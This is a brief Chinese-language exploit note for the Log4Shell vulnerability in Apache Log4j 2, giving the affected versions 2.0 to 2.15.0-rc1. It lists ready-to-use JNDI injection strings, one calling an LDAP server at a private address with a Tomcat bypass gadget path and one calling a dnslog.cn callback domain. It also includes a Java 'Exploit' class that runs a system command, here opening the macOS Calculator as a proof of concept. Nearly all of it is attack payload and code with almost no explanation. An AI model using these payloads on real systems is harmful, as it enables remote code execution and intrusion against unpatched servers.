0x01
${jndi:ldap:/192.168.172.1:8081/TomcatBypass/TomcatEcho}&password=123
${jndi:ldap://xxxxx.4y9yxh.dnslog.cn/test}
影响版本:2.0 <= Apache Log4j 2 <= log4j-2.15.0-rc1
弹出计算器
```
public class Exploit {
public Exploit(){
try{
// 要执行的命令
String[] commands = {"open", "/System/Applications/Calculator.app"};
Process pc = Runtime.getRuntime().exec(commands);
pc.waitFor();
} catch(Exception e){
e.printStackTrace();
}
}
public static void main(String[] argv) {
Exploit e = new Exploit();
}
}
```
